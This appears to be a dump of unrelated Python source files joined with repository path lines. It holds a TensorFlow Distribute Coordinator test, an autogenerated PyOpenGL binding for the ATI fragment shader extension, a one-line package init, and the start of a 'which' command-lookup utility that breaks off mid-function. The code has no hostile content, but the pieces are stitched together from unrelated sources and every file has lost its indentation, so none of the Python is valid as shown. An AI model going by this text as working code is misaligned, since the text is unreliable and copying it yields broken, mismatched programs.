# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests that show Distribute Coordinator works with Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import json
import os
import sys
import tempfile
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.contrib.distribute.python import combinations
from tensorflow.contrib.distribute.python import mirrored_strategy
from tensorflow.contrib.distribute.python import multi_worker_test_base
from tensorflow.contrib.distribute.python import parameter_server_strategy
from tensorflow.contrib.optimizer_v2 import adagrad
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import distribute_coordinator as dc
from tensorflow.python.distribute import estimator_training as dc_training
from tensorflow.python.distribute.distribute_config import DistributeConfig
from tensorflow.python.eager import context
from tensorflow.python.estimator import exporter as exporter_lib
from tensorflow.python.estimator import run_config as run_config_lib
from tensorflow.python.estimator import training as estimator_training
from tensorflow.python.estimator.canned import dnn_linear_combined
from tensorflow.python.estimator.canned import prediction_keys
from tensorflow.python.estimator.export import export as export_lib
from tensorflow.python.feature_column import feature_column
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.summary import summary_iterator
from tensorflow.python.summary.writer import writer_cache
BATCH_SIZE = 10
LABEL_DIMENSION = 2
DATA = np.linspace(
0., 2., BATCH_SIZE * LABEL_DIMENSION, dtype=np.float32).reshape(
BATCH_SIZE, LABEL_DIMENSION)
EVAL_NAME = "foo"
EXPORTER_NAME = "saved_model_exporter"
MAX_STEPS = 10
CHIEF = dc._TaskType.CHIEF
EVALUATOR = dc._TaskType.EVALUATOR
WORKER = dc._TaskType.WORKER
PS = dc._TaskType.PS
original_run_std_server = dc._run_std_server
class MockOsEnv(dict):
def __init__(self, *args):
self._thread_local = threading.local()
super(MockOsEnv, self).__init__(*args)
def get(self, key, default):
if not hasattr(self._thread_local, "dict"):
self._thread_local.dict = dict()
if key == "TF_CONFIG":
return dict.get(self._thread_local.dict, key, default)
else:
return dict.get(self, key, default)
def __getitem__(self, key):
if not hasattr(self._thread_local, "dict"):
self._thread_local.dict = dict()
if key == "TF_CONFIG":
return dict.__getitem__(self._thread_local.dict, key)
else:
return dict.__getitem__(self, key)
def __setitem__(self, key, val):
if not hasattr(self._thread_local, "dict"):
self._thread_local.dict = dict()
if key == "TF_CONFIG":
return dict.__setitem__(self._thread_local.dict, key, val)
else:
return dict.__setitem__(self, key, val)
class DistributeCoordinatorIntegrationTest(test.TestCase,
parameterized.TestCase):
@classmethod
def setUpClass(cls):
"""Create a local cluster with 2 workers."""
cls._cluster_spec = multi_worker_test_base.create_in_process_cluster(
num_workers=3, num_ps=2, has_eval=True)
def setUp(self):
self._model_dir = tempfile.mkdtemp()
self._mock_os_env = MockOsEnv()
self._mock_context = test.mock.patch.object(os, "environ",
self._mock_os_env)
super(DistributeCoordinatorIntegrationTest, self).setUp()
self._mock_context.__enter__()
def tearDown(self):
self._mock_context.__exit__(None, None, None)
super(DistributeCoordinatorIntegrationTest, self).tearDown()
def dataset_input_fn(self, x, y, batch_size, shuffle):
def input_fn():
dataset = dataset_ops.Dataset.from_tensor_slices((x, y))
if shuffle:
dataset = dataset.shuffle(batch_size)
dataset = dataset.repeat(100).batch(batch_size)
return dataset
return input_fn
def _get_exporter(self, name, fc):
feature_spec = feature_column.make_parse_example_spec(fc)
serving_input_receiver_fn = (
export_lib.build_parsing_serving_input_receiver_fn(feature_spec))
return exporter_lib.LatestExporter(
name, serving_input_receiver_fn=serving_input_receiver_fn)
def _extract_loss_and_global_step(self, event_folder):
"""Returns the loss and global step in last event."""
event_paths = glob.glob(os.path.join(event_folder, "events*"))
loss = None
global_step_count = None
for e in summary_iterator.summary_iterator(event_paths[-1]):
current_loss = None
for v in e.summary.value:
if v.tag == "loss":
current_loss = v.simple_value
# If loss is not found, global step is meaningless.
if current_loss is None:
continue
current_global_step = e.step
if global_step_count is None or current_global_step > global_step_count:
global_step_count = current_global_step
loss = current_loss
return (loss, global_step_count)
def _get_estimator(self,
train_distribute,
eval_distribute,
remote_cluster=None):
input_dimension = LABEL_DIMENSION
linear_feature_columns = [
feature_column.numeric_column("x", shape=(input_dimension,))
]
dnn_feature_columns = [
feature_column.numeric_column("x", shape=(input_dimension,))
]
return dnn_linear_combined.DNNLinearCombinedRegressor(
linear_feature_columns=linear_feature_columns,
dnn_hidden_units=(2, 2),
dnn_feature_columns=dnn_feature_columns,
label_dimension=LABEL_DIMENSION,
model_dir=self._model_dir,
dnn_optimizer=adagrad.AdagradOptimizer(0.001),
linear_optimizer=adagrad.AdagradOptimizer(0.001),
config=run_config_lib.RunConfig(
experimental_distribute=DistributeConfig(
train_distribute=train_distribute,
eval_distribute=eval_distribute,
remote_cluster=remote_cluster)))
def _complete_flow(self,
train_distribute,
eval_distribute,
remote_cluster=None):
estimator = self._get_estimator(train_distribute, eval_distribute,
remote_cluster)
input_dimension = LABEL_DIMENSION
train_input_fn = self.dataset_input_fn(
x={"x": DATA},
y=DATA,
batch_size=BATCH_SIZE // len(train_distribute.worker_devices),
shuffle=True)
if eval_distribute:
eval_batch_size = BATCH_SIZE // len(eval_distribute.worker_devices)
else:
eval_batch_size = BATCH_SIZE
eval_input_fn = self.dataset_input_fn(
x={"x": DATA}, y=DATA, batch_size=eval_batch_size, shuffle=False)
linear_feature_columns = [
feature_column.numeric_column("x", shape=(input_dimension,))
]
dnn_feature_columns = [
feature_column.numeric_column("x", shape=(input_dimension,))
]
feature_columns = linear_feature_columns + dnn_feature_columns
estimator_training.train_and_evaluate(
estimator,
estimator_training.TrainSpec(train_input_fn, max_steps=MAX_STEPS),
estimator_training.EvalSpec(
name=EVAL_NAME,
input_fn=eval_input_fn,
steps=None,
exporters=self._get_exporter(EXPORTER_NAME, feature_columns),
start_delay_secs=0,
throttle_secs=1))
return estimator
def _inspect_train_and_eval_events(self, estimator):
# Make sure nothing is stuck in limbo.
writer_cache.FileWriterCache.clear()
# Examine the training events. Use a range to check global step to avoid
# flakyness due to global step race condition.
training_loss, _ = self._extract_loss_and_global_step(self._model_dir)
self.assertIsNotNone(training_loss)
# Examine the eval events. The global step should be accurate.
eval_dir = os.path.join(self._model_dir, "eval_" + EVAL_NAME)
eval_loss, eval_global_step = self._extract_loss_and_global_step(
event_folder=eval_dir)
self.assertIsNotNone(eval_loss)
self.assertGreaterEqual(eval_global_step, MAX_STEPS)
# Examine the export folder.
export_dir = os.path.join(
os.path.join(self._model_dir, "export"), EXPORTER_NAME)
self.assertTrue(gfile.Exists(export_dir))
# Examine the ckpt for predict.
def predict_input_fn():
return dataset_ops.Dataset.from_tensor_slices({
"x": DATA
}).batch(BATCH_SIZE)
predicted_proba = np.array([
x[prediction_keys.PredictionKeys.PREDICTIONS]
for x in estimator.predict(predict_input_fn)
])
self.assertAllEqual((BATCH_SIZE, LABEL_DIMENSION), predicted_proba.shape)
@combinations.generate(
combinations.combine(
mode=["graph"],
train_distribute_cls=[
mirrored_strategy.MirroredStrategy,
parameter_server_strategy.ParameterServerStrategy
],
eval_distribute_cls=[
None, mirrored_strategy.MirroredStrategy,
parameter_server_strategy.ParameterServerStrategy
],
required_gpus=1))
def test_complete_flow_standalone_client(self, train_distribute_cls,
eval_distribute_cls):
try:
train_distribute = train_distribute_cls(num_gpus=context.num_gpus())
except TypeError:
train_distribute = train_distribute_cls(num_gpus_per_worker=2)
if eval_distribute_cls:
eval_distribute = eval_distribute_cls()
else:
eval_distribute = None
estimator = self._complete_flow(
train_distribute, eval_distribute, remote_cluster=self._cluster_spec)
self._inspect_train_and_eval_events(estimator)
def _mock_run_std_server(self, *args, **kwargs):
ret = original_run_std_server(*args, **kwargs)
# Wait for all std servers to be brought up in order to reduce the chance of
# remote sessions taking local ports that have been assigned to std servers.
self._barrier.wait()
return ret
def _task_thread(self, train_distribute, eval_distribute, tf_config):
os.environ["TF_CONFIG"] = json.dumps(tf_config)
with test.mock.patch.object(dc, "_run_std_server",
self._mock_run_std_server):
self._complete_flow(train_distribute, eval_distribute)
def _run_task_in_thread(self, cluster_spec, task_type, task_id,
train_distribute, eval_distribute):
if task_type:
tf_config = {
"cluster": cluster_spec,
"task": {
"type": task_type,
"index": task_id
}
}
else:
tf_config = {
"cluster": cluster_spec,
"task": {
"type": task_type,
"index": task_id
}
}
t = threading.Thread(
target=self._task_thread,
args=(train_distribute, eval_distribute, tf_config))
t.start()
return t
def _run_multiple_tasks_in_threads(self, cluster_spec, train_distribute,
eval_distribute):
threads = {}
for task_type in cluster_spec.keys():
threads[task_type] = []
for task_id in range(len(cluster_spec[task_type])):
t = self._run_task_in_thread(cluster_spec, task_type, task_id,
train_distribute, eval_distribute)
threads[task_type].append(t)
return threads
@combinations.generate(
combinations.combine(
mode=["graph"],
train_distribute_cls=[
parameter_server_strategy.ParameterServerStrategy,
],
eval_distribute_cls=[
None, mirrored_strategy.MirroredStrategy,
parameter_server_strategy.ParameterServerStrategy
],
required_gpus=1))
def test_complete_flow_indepedent_worker_between_graph(
self, train_distribute_cls, eval_distribute_cls):
train_distribute = train_distribute_cls(
num_gpus_per_worker=context.num_gpus())
if eval_distribute_cls:
eval_distribute = eval_distribute_cls()
else:
eval_distribute = None
cluster_spec = multi_worker_test_base.create_cluster_spec(
num_workers=3, num_ps=2, has_eval=True)
# 3 workers, 2 ps and 1 evaluator.
self._barrier = dc._Barrier(6)
threads = self._run_multiple_tasks_in_threads(
cluster_spec, train_distribute, eval_distribute)
for task_type, ts in threads.items():
if task_type == PS:
continue
for t in ts:
t.join()
estimator = self._get_estimator(train_distribute, eval_distribute)
self._inspect_train_and_eval_events(estimator)
@combinations.generate(
combinations.combine(
mode=["graph"],
train_distribute_cls=[mirrored_strategy.MirroredStrategy],
eval_distribute_cls=[None, mirrored_strategy.MirroredStrategy],
required_gpus=1))
def test_complete_flow_indepedent_worker_in_graph(self, train_distribute_cls,
eval_distribute_cls):
train_distribute = train_distribute_cls(num_gpus=context.num_gpus())
if eval_distribute_cls:
eval_distribute = eval_distribute_cls()
else:
eval_distribute = None
cluster_spec = multi_worker_test_base.create_cluster_spec(
num_workers=3, num_ps=0, has_eval=True)
# 3 workers and 1 evaluator.
self._barrier = dc._Barrier(4)
threads = self._run_multiple_tasks_in_threads(
cluster_spec, train_distribute, eval_distribute)
threads[WORKER][0].join()
threads[EVALUATOR][0].join()
estimator = self._get_estimator(train_distribute, eval_distribute)
self._inspect_train_and_eval_events(estimator)
TF_CONFIG_WITH_CHIEF = {
"cluster": {
"chief": ["fake_chief"],
},
"task": {
"type": "chief",
"index": 0
}
}
TF_CONFIG_WITH_MASTER = {
"cluster": {
"master": ["fake_master"],
},
"task": {
"type": "master",
"index": 0
}
}
TF_CONFIG_WITHOUT_TASK = {"cluster": {"chief": ["fake_worker"]}}
class RunConfigTest(test.TestCase):
def test_previously_unexpected_cluster_spec(self):
with test.mock.patch.dict(
"os.environ", {"TF_CONFIG": json.dumps(TF_CONFIG_WITHOUT_TASK)}):
run_config_lib.RunConfig(
experimental_distribute=DistributeConfig(
train_distribute=mirrored_strategy.MirroredStrategy(num_gpus=2)))
def test_should_run_distribute_coordinator(self):
"""Tests that should_run_distribute_coordinator return a correct value."""
# We don't use distribute coordinator for local training.
self.assertFalse(
dc_training.should_run_distribute_coordinator(
run_config_lib.RunConfig()))
# When `train_distribute` is not specified, don't use distribute
# coordinator.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_CHIEF)}):
self.assertFalse(
dc_training.should_run_distribute_coordinator(
run_config_lib.RunConfig()))
# When `train_distribute` is specified and TF_CONFIG is detected, use
# distribute coordinator.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_CHIEF)}):
config_with_train_distribute = run_config_lib.RunConfig(
experimental_distribute=DistributeConfig(
train_distribute=mirrored_strategy.MirroredStrategy(num_gpus=2)))
config_with_eval_distribute = run_config_lib.RunConfig(
experimental_distribute=DistributeConfig(
eval_distribute=mirrored_strategy.MirroredStrategy(num_gpus=2)))
self.assertTrue(
dc_training.should_run_distribute_coordinator(
config_with_train_distribute))
self.assertFalse(
dc_training.should_run_distribute_coordinator(
config_with_eval_distribute))
# With a master in the cluster, don't run distribute coordinator.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_MASTER)}):
config = run_config_lib.RunConfig(
experimental_distribute=DistributeConfig(
train_distribute=mirrored_strategy.MirroredStrategy(num_gpus=2)))
self.assertFalse(dc_training.should_run_distribute_coordinator(config))
def test_init_run_config_duplicate_distribute(self):
with self.assertRaises(ValueError):
run_config_lib.RunConfig(
train_distribute=mirrored_strategy.MirroredStrategy(),
experimental_distribute=DistributeConfig(
train_distribute=mirrored_strategy.MirroredStrategy()))
with self.assertRaises(ValueError):
run_config_lib.RunConfig(
eval_distribute=mirrored_strategy.MirroredStrategy(),
experimental_distribute=DistributeConfig(
eval_distribute=mirrored_strategy.MirroredStrategy()))
def test_init_run_config_none_distribute_coordinator_mode(self):
# We don't use distribute coordinator for local training.
config = run_config_lib.RunConfig(
train_distribute=mirrored_strategy.MirroredStrategy())
dc_training.init_run_config(config, {})
self.assertIsNone(config._distribute_coordinator_mode)
# With a master in the cluster, don't run distribute coordinator.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_MASTER)}):
config = run_config_lib.RunConfig(
train_distribute=mirrored_strategy.MirroredStrategy())
self.assertIsNone(config._distribute_coordinator_mode)
# When `train_distribute` is not specified, don't use distribute
# coordinator.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_CHIEF)}):
config = run_config_lib.RunConfig()
self.assertFalse(hasattr(config, "_distribute_coordinator_mode"))
def test_init_run_config_independent_worker(self):
# When `train_distribute` is specified and TF_CONFIG is detected, use
# distribute coordinator with INDEPENDENT_WORKER mode.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_CHIEF)}):
config = run_config_lib.RunConfig(
train_distribute=mirrored_strategy.MirroredStrategy())
self.assertEqual(config._distribute_coordinator_mode,
dc.CoordinatorMode.INDEPENDENT_WORKER)
def test_init_run_config_standalone_client(self):
# When `train_distribute` is specified, TF_CONFIG is detected and
# `experimental.remote_cluster` is set use distribute coordinator with
# STANDALONE_CLIENT mode.
config = run_config_lib.RunConfig(
train_distribute=mirrored_strategy.MirroredStrategy(),
experimental_distribute=DistributeConfig(
remote_cluster={"chief": ["fake_worker"]}))
self.assertEqual(config._distribute_coordinator_mode,
dc.CoordinatorMode.STANDALONE_CLIENT)
if __name__ == "__main__":
with test.mock.patch.object(sys, "exit", os._exit):
test.main()
|
kenshay/ImageScript
|
refs/heads/master
|
ProgramData/SystemFiles/Python/Lib/site-packages/OpenGL/raw/GL/ATI/fragment_shader.py
|
9
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ATI_fragment_shader'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ATI_fragment_shader',error_checker=_errors._error_checker)
GL_2X_BIT_ATI=_C('GL_2X_BIT_ATI',0x00000001)
GL_4X_BIT_ATI=_C('GL_4X_BIT_ATI',0x00000002)
GL_8X_BIT_ATI=_C('GL_8X_BIT_ATI',0x00000004)
GL_ADD_ATI=_C('GL_ADD_ATI',0x8963)
GL_BIAS_BIT_ATI=_C('GL_BIAS_BIT_ATI',0x00000008)
GL_BLUE_BIT_ATI=_C('GL_BLUE_BIT_ATI',0x00000004)
GL_CND0_ATI=_C('GL_CND0_ATI',0x896B)
GL_CND_ATI=_C('GL_CND_ATI',0x896A)
GL_COLOR_ALPHA_PAIRING_ATI=_C('GL_COLOR_ALPHA_PAIRING_ATI',0x8975)
GL_COMP_BIT_ATI=_C('GL_COMP_BIT_ATI',0x00000002)
GL_CON_0_ATI=_C('GL_CON_0_ATI',0x8941)
GL_CON_10_ATI=_C('GL_CON_10_ATI',0x894B)
GL_CON_11_ATI=_C('GL_CON_11_ATI',0x894C)
GL_CON_12_ATI=_C('GL_CON_12_ATI',0x894D)
GL_CON_13_ATI=_C('GL_CON_13_ATI',0x894E)
GL_CON_14_ATI=_C('GL_CON_14_ATI',0x894F)
GL_CON_15_ATI=_C('GL_CON_15_ATI',0x8950)
GL_CON_16_ATI=_C('GL_CON_16_ATI',0x8951)
GL_CON_17_ATI=_C('GL_CON_17_ATI',0x8952)
GL_CON_18_ATI=_C('GL_CON_18_ATI',0x8953)
GL_CON_19_ATI=_C('GL_CON_19_ATI',0x8954)
GL_CON_1_ATI=_C('GL_CON_1_ATI',0x8942)
GL_CON_20_ATI=_C('GL_CON_20_ATI',0x8955)
GL_CON_21_ATI=_C('GL_CON_21_ATI',0x8956)
GL_CON_22_ATI=_C('GL_CON_22_ATI',0x8957)
GL_CON_23_ATI=_C('GL_CON_23_ATI',0x8958)
GL_CON_24_ATI=_C('GL_CON_24_ATI',0x8959)
GL_CON_25_ATI=_C('GL_CON_25_ATI',0x895A)
GL_CON_26_ATI=_C('GL_CON_26_ATI',0x895B)
GL_CON_27_ATI=_C('GL_CON_27_ATI',0x895C)
GL_CON_28_ATI=_C('GL_CON_28_ATI',0x895D)
GL_CON_29_ATI=_C('GL_CON_29_ATI',0x895E)
GL_CON_2_ATI=_C('GL_CON_2_ATI',0x8943)
GL_CON_30_ATI=_C('GL_CON_30_ATI',0x895F)
GL_CON_31_ATI=_C('GL_CON_31_ATI',0x8960)
GL_CON_3_ATI=_C('GL_CON_3_ATI',0x8944)
GL_CON_4_ATI=_C('GL_CON_4_ATI',0x8945)
GL_CON_5_ATI=_C('GL_CON_5_ATI',0x8946)
GL_CON_6_ATI=_C('GL_CON_6_ATI',0x8947)
GL_CON_7_ATI=_C('GL_CON_7_ATI',0x8948)
GL_CON_8_ATI=_C('GL_CON_8_ATI',0x8949)
GL_CON_9_ATI=_C('GL_CON_9_ATI',0x894A)
GL_DOT2_ADD_ATI=_C('GL_DOT2_ADD_ATI',0x896C)
GL_DOT3_ATI=_C('GL_DOT3_ATI',0x8966)
GL_DOT4_ATI=_C('GL_DOT4_ATI',0x8967)
GL_EIGHTH_BIT_ATI=_C('GL_EIGHTH_BIT_ATI',0x00000020)
GL_FRAGMENT_SHADER_ATI=_C('GL_FRAGMENT_SHADER_ATI',0x8920)
GL_GREEN_BIT_ATI=_C('GL_GREEN_BIT_ATI',0x00000002)
GL_HALF_BIT_ATI=_C('GL_HALF_BIT_ATI',0x00000008)
GL_LERP_ATI=_C('GL_LERP_ATI',0x8969)
GL_MAD_ATI=_C('GL_MAD_ATI',0x8968)
GL_MOV_ATI=_C('GL_MOV_ATI',0x8961)
GL_MUL_ATI=_C('GL_MUL_ATI',0x8964)
GL_NEGATE_BIT_ATI=_C('GL_NEGATE_BIT_ATI',0x00000004)
GL_NUM_FRAGMENT_CONSTANTS_ATI=_C('GL_NUM_FRAGMENT_CONSTANTS_ATI',0x896F)
GL_NUM_FRAGMENT_REGISTERS_ATI=_C('GL_NUM_FRAGMENT_REGISTERS_ATI',0x896E)
GL_NUM_INPUT_INTERPOLATOR_COMPONENTS_ATI=_C('GL_NUM_INPUT_INTERPOLATOR_COMPONENTS_ATI',0x8973)
GL_NUM_INSTRUCTIONS_PER_PASS_ATI=_C('GL_NUM_INSTRUCTIONS_PER_PASS_ATI',0x8971)
GL_NUM_INSTRUCTIONS_TOTAL_ATI=_C('GL_NUM_INSTRUCTIONS_TOTAL_ATI',0x8972)
GL_NUM_LOOPBACK_COMPONENTS_ATI=_C('GL_NUM_LOOPBACK_COMPONENTS_ATI',0x8974)
GL_NUM_PASSES_ATI=_C('GL_NUM_PASSES_ATI',0x8970)
GL_QUARTER_BIT_ATI=_C('GL_QUARTER_BIT_ATI',0x00000010)
GL_RED_BIT_ATI=_C('GL_RED_BIT_ATI',0x00000001)
GL_REG_0_ATI=_C('GL_REG_0_ATI',0x8921)
GL_REG_10_ATI=_C('GL_REG_10_ATI',0x892B)
GL_REG_11_ATI=_C('GL_REG_11_ATI',0x892C)
GL_REG_12_ATI=_C('GL_REG_12_ATI',0x892D)
GL_REG_13_ATI=_C('GL_REG_13_ATI',0x892E)
GL_REG_14_ATI=_C('GL_REG_14_ATI',0x892F)
GL_REG_15_ATI=_C('GL_REG_15_ATI',0x8930)
GL_REG_16_ATI=_C('GL_REG_16_ATI',0x8931)
GL_REG_17_ATI=_C('GL_REG_17_ATI',0x8932)
GL_REG_18_ATI=_C('GL_REG_18_ATI',0x8933)
GL_REG_19_ATI=_C('GL_REG_19_ATI',0x8934)
GL_REG_1_ATI=_C('GL_REG_1_ATI',0x8922)
GL_REG_20_ATI=_C('GL_REG_20_ATI',0x8935)
GL_REG_21_ATI=_C('GL_REG_21_ATI',0x8936)
GL_REG_22_ATI=_C('GL_REG_22_ATI',0x8937)
GL_REG_23_ATI=_C('GL_REG_23_ATI',0x8938)
GL_REG_24_ATI=_C('GL_REG_24_ATI',0x8939)
GL_REG_25_ATI=_C('GL_REG_25_ATI',0x893A)
GL_REG_26_ATI=_C('GL_REG_26_ATI',0x893B)
GL_REG_27_ATI=_C('GL_REG_27_ATI',0x893C)
GL_REG_28_ATI=_C('GL_REG_28_ATI',0x893D)
GL_REG_29_ATI=_C('GL_REG_29_ATI',0x893E)
GL_REG_2_ATI=_C('GL_REG_2_ATI',0x8923)
GL_REG_30_ATI=_C('GL_REG_30_ATI',0x893F)
GL_REG_31_ATI=_C('GL_REG_31_ATI',0x8940)
GL_REG_3_ATI=_C('GL_REG_3_ATI',0x8924)
GL_REG_4_ATI=_C('GL_REG_4_ATI',0x8925)
GL_REG_5_ATI=_C('GL_REG_5_ATI',0x8926)
GL_REG_6_ATI=_C('GL_REG_6_ATI',0x8927)
GL_REG_7_ATI=_C('GL_REG_7_ATI',0x8928)
GL_REG_8_ATI=_C('GL_REG_8_ATI',0x8929)
GL_REG_9_ATI=_C('GL_REG_9_ATI',0x892A)
GL_SATURATE_BIT_ATI=_C('GL_SATURATE_BIT_ATI',0x00000040)
GL_SECONDARY_INTERPOLATOR_ATI=_C('GL_SECONDARY_INTERPOLATOR_ATI',0x896D)
GL_SUB_ATI=_C('GL_SUB_ATI',0x8965)
GL_SWIZZLE_STQ_ATI=_C('GL_SWIZZLE_STQ_ATI',0x8977)
GL_SWIZZLE_STQ_DQ_ATI=_C('GL_SWIZZLE_STQ_DQ_ATI',0x8979)
GL_SWIZZLE_STRQ_ATI=_C('GL_SWIZZLE_STRQ_ATI',0x897A)
GL_SWIZZLE_STRQ_DQ_ATI=_C('GL_SWIZZLE_STRQ_DQ_ATI',0x897B)
GL_SWIZZLE_STR_ATI=_C('GL_SWIZZLE_STR_ATI',0x8976)
GL_SWIZZLE_STR_DR_ATI=_C('GL_SWIZZLE_STR_DR_ATI',0x8978)
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glAlphaFragmentOp1ATI(op,dst,dstMod,arg1,arg1Rep,arg1Mod):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glAlphaFragmentOp2ATI(op,dst,dstMod,arg1,arg1Rep,arg1Mod,arg2,arg2Rep,arg2Mod):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glAlphaFragmentOp3ATI(op,dst,dstMod,arg1,arg1Rep,arg1Mod,arg2,arg2Rep,arg2Mod,arg3,arg3Rep,arg3Mod):pass
@_f
@_p.types(None,)
def glBeginFragmentShaderATI():pass
@_f
@_p.types(None,_cs.GLuint)
def glBindFragmentShaderATI(id):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glColorFragmentOp1ATI(op,dst,dstMask,dstMod,arg1,arg1Rep,arg1Mod):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glColorFragmentOp2ATI(op,dst,dstMask,dstMod,arg1,arg1Rep,arg1Mod,arg2,arg2Rep,arg2Mod):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glColorFragmentOp3ATI(op,dst,dstMask,dstMod,arg1,arg1Rep,arg1Mod,arg2,arg2Rep,arg2Mod,arg3,arg3Rep,arg3Mod):pass
@_f
@_p.types(None,_cs.GLuint)
def glDeleteFragmentShaderATI(id):pass
@_f
@_p.types(None,)
def glEndFragmentShaderATI():pass
@_f
@_p.types(_cs.GLuint,_cs.GLuint)
def glGenFragmentShadersATI(range):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLuint,_cs.GLenum)
def glPassTexCoordATI(dst,coord,swizzle):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLuint,_cs.GLenum)
def glSampleMapATI(dst,interp,swizzle):pass
@_f
@_p.types(None,_cs.GLuint,arrays.GLfloatArray)
def glSetFragmentShaderConstantATI(dst,value):pass
|
devananda/python-redfish
|
refs/heads/master
|
examples/__init__.py
|
2
|
__author__ = 'deva'
|
vrjuggler/maestro
|
refs/heads/master
|
maestro/daemon/plugins/services/launch/which.py
|
2
|
#!/usr/bin/env python
# Copyright (c) 2002-2005 ActiveState Corp.
# See LICENSE-which.txt for license details.
# Author:
# Trent Mick ([email protected])
# Home:
# http://trentm.com/projects/which/
r"""Find the full path to commands.
which(command, path=None, verbose=0, exts=None)
Return the full path to the first match of the given command on the
path.
whichall(command, path=None, verbose=0, exts=None)
Return a list of full paths to all matches of the given command on
the path.
whichgen(command, path=None, verbose=0, exts=None)
Return a generator which will yield full paths to all matches of the
given command on the path.
By default the PATH environment variable is searched (as well as, on
Windows, the AppPaths key in the registry), but a specific 'path' list
to search may be specified as well. On Windows, the PATHEXT environment
variable is applied as appropriate.
If "verbose" is true then a tuple of the form
(<fullpath>, <matched-where-description>)
is returned for each match. The latter element is a textual description
of where the match was found. For example:
from PATH element 0
from HKLM\SOFTWARE\...\perl.exe
"""
_cmdlnUsage = """
Show the full path of commands.
Usage:
which [<options>...] [<command-name>...]
Options:
-h, --help Print this help and exit.
-V, --version Print the version info and exit.
-a, --all Print *all* matching paths.
-v, --verbose Print out how matches were located and
show near misses on stderr.
-q, --quiet Just print out matches. I.e., do not print out
near misses.
-p <altpath>, --path=<altpath>
An alternative path (list of directories) may
be specified for searching.
-e <exts>, --exts=<exts>
Specify a list of extensions to consider instead
of the usual list (';'-separate list, Windows
only).
Show the full path to the program that would be run for each given
command name, if any. Which, like GNU's which, returns the number of
failed arguments, or -1 when no <command-name> was given.
Near misses include duplicates, non-regular files and (on Un*x)
files without executable access.
"""
__revision__ = "$Id: which.py 430 2005-08-20 03:11:58Z trentm $"
__version_info__ = (1, 1, 0)
__version__ = '.'.join(map(str, __version_info__))
import os
import sys
import getopt
import stat
#---- exceptions
class WhichError(Exception):
pass
#---- internal support stuff
def _getRegisteredExecutable(exeName):
"""Windows allow application paths to be registered in the registry."""
registered = None
if sys.platform.startswith('win'):
if os.path.splitext(exeName)[1].lower() != '.exe':
exeName += '.exe'
import _winreg
try:
key = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\" +\
exeName
value = _winreg.QueryValue(_winreg.HKEY_LOCAL_MACHINE, key)
registered = (value, "from HKLM\\"+key)
except _winreg.error:
pass
if registered and not os.path.exists(registered[0]):
registered = None
return registered
def _samefile(fname1, fname2):
if sys.platform.startswith('win'):
return ( os.path.normpath(os.path.normcase(fname1)) ==\
os.path.normpath(os.path.normcase(fname2)) )
else:
return os.path.samefile(fname1, fname2)
def _cull(potential, matches, verbose=0):
"""Cull inappropriate matches. Possible reasons:
- a duplicate of a previous match
- not a disk file
- not executable (non-Windows)
If 'potential' is approved it is returned and added to 'matches'.
Otherwise, None is returned.
"""
for match in matches: # don't yield duplicates
if _samefile(potential[0], match[0]):
if verbose:
sys.stderr.write("duplicate: %s (%s)\n" % potential)
return None
else:
if not stat.S_ISREG(os.stat(potential[0]).st_mode):
if verbose:
sys.stderr.write("not a regular file: %s (%s)\n" % potential)
elif not os.access(potential[0], os.X_OK):
if verbose:
sys.stderr.write("no executable access: %s (%s)\n"\
% potential)
else:
matches.append(potential)
return potential
#---- module API
def whichgen(command, path=None, verbose=0, exts=None):
"""Return a generator of full paths to the given command.
"command" is a the name of the executable to search for.
"path" is an optional alternate path list to search. The default it
to use the PATH environment variable.
"verbose", if true, will cause a 2-tuple to be returned for each
match. The second element is a textual description of where the
match was found.
"exts" optionally allows one to specify a list of extensions to use
instead of the standard list for this system. This can
effectively be used as an optimization to, for example, avoid
stat's of "foo.vbs" when searching for "foo" and you know it is
not a VisualBasic script but ".vbs" is on PATHEXT. This option
is only supported on Windows.
This method returns a generator which yields either full paths to
the given command or, if verbose, tuples of the form (<path to
command>, <where path found>).
"""
matches = []
if path is None:
usingGivenPath = 0
path = os.environ.get("PATH", "").split(os.pathsep)
